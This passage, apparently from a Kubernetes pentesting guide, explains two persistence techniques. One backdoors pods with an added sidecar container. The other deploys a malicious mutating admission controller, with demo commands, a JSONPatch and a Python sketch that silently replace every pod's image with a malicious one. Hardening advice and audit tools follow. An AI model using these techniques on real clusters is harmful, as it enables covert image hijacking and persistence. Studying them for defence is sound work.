For example, the following is part of the configuration of a pod with 2 containers:

spec:
  containers:
    - name: main-application
      image: nginx
    - name: sidecar-container
      image: busybox
      command: ["sh","-c","<execute something in the same pod but different container>"]

For example, to backdoor an existing pod with a new container you could just add a new container in the specification. Note that you could give more permissions to the second container that the first won’t have.

More info at: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/

Malicious Admission Controller

An admission controller intercepts requests to the Kubernetes API server before the persistence of the object, but after the request is authenticated and authorized.

If an attacker somehow manages to inject a Mutating Admission Controller, they will be able to modify already authenticated requests, potentially allowing privilege escalation and, more commonly, persistence in the cluster.

Example from https://blog.rewanthtammana.com/creating-malicious-admission-controllers:

git clone https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo

cd malicious-admission-controller-webhook-demo

./deploy.sh



kubectl get po -n webhook-demo -w



Check the status to see if it’s ready:

kubectl get mutatingwebhookconfigurations

kubectl get deploy,svc -n webhook-demo

Then deploy a new pod:

kubectl run nginx --image nginx

kubectl get po -w

When you see an ErrImagePull error, check the image name with either of the queries:

kubectl get po nginx -o=jsonpath='{.spec.containers[].image}{"\n"}'

kubectl describe po nginx | grep "Image: "

As you can see in the above image, we tried running image nginx but the final executed image is rewanthtammana/malicious-image. What just happened!!?

Technicalities

The ./deploy.sh script establishes a mutating webhook admission controller, which modifies requests to the Kubernetes API as specified in its configuration lines, influencing the outcomes observed:

patches = append(patches, patchOperation{
    Op:    "replace",
    Path:  "/spec/containers/0/image",
    Value: "rewanthtammana/malicious-image",
})

The above snippet replaces the first container image in every pod with rewanthtammana/malicious-image.
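For context, the patch is returned to the API server inside an AdmissionReview response, base64-encoded and declared as a JSONPatch. A minimal Python sketch of that response body is shown here. The function name mutate_response and the uid value "request-uid" are placeholders, and the demo repository itself implements this in Go.

```python
import base64
import json


def mutate_response(uid, image):
    """Build an AdmissionReview response that swaps the first container image."""
    patch = [{"op": "replace", "path": "/spec/containers/0/image", "value": image}]
    return {
        "apiVersion": "admission.k8s.io/v1",
        "kind": "AdmissionReview",
        "response": {
            "uid": uid,  # must echo the uid of the incoming request
            "allowed": True,
            "patchType": "JSONPatch",
            "patch": base64.b64encode(json.dumps(patch).encode()).decode(),
        },
    }


review = mutate_response("request-uid", "rewanthtammana/malicious-image")
print(json.dumps(review, indent=2))
```

Note that the request is still allowed. The webhook does not block anything, it only rewrites the object before it is persisted.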

OPA Gatekeeper bypass

Kubernetes OPA Gatekeeper bypass

Best Practices

Disabling Automount of Service Account Tokens

- Pods and Service Accounts: By default, pods mount a service account token. To enhance security, Kubernetes allows the disabling of this automount feature.

- How to Apply: Set automountServiceAccountToken: false in the configuration of service accounts or pods, starting from Kubernetes version 1.6.
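Since the setting can live in two places, it helps to be explicit about which one wins when auditing. The sketch below is a simplified Python model, assuming the pod spec and the service account are available as dicts. The function name token_is_mounted is hypothetical. It follows the documented precedence: the pod-level value overrides the service account's, and the default is to mount.

```python
def token_is_mounted(pod_spec, service_account=None):
    """Simplified: pod-level setting wins, then the SA's, default is True."""
    key = "automountServiceAccountToken"
    if key in pod_spec:
        return bool(pod_spec[key])
    if service_account and key in service_account:
        return bool(service_account[key])
    return True


sa_disabled = {"automountServiceAccountToken": False}

print(token_is_mounted({}))                                               # True
print(token_is_mounted({}, sa_disabled))                                  # False
print(token_is_mounted({"automountServiceAccountToken": True}, sa_disabled))  # True
```

The last case is the one to watch for: disabling the automount on the service account does not help if a pod explicitly re-enables it.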

Restrictive User Assignment in RoleBindings/ClusterRoleBindings

- Selective Inclusion: Ensure that only necessary users are included in RoleBindings or ClusterRoleBindings. Regularly audit and remove irrelevant users to maintain tight security.

Namespace-Specific Roles Over Cluster-Wide Roles

- Roles vs. ClusterRoles: Prefer using Roles and RoleBindings for namespace-specific permissions rather than ClusterRoles and ClusterRoleBindings, which apply cluster-wide. This approach offers finer control and limits the scope of permissions.

Use automated tools

GitHub - cyberark/KubiScan: A tool to scan Kubernetes cluster for risky permissions

GitHub - aquasecurity/kube-hunter: Hunt for security weaknesses in Kubernetes clusters

References

- https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions

- https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1

- https://blog.rewanthtammana.com/creating-malicious-admission-controllers

- https://kubenomicon.com/Lateral_movement/CoreDNS_poisoning.html

- https://kubenomicon.com/
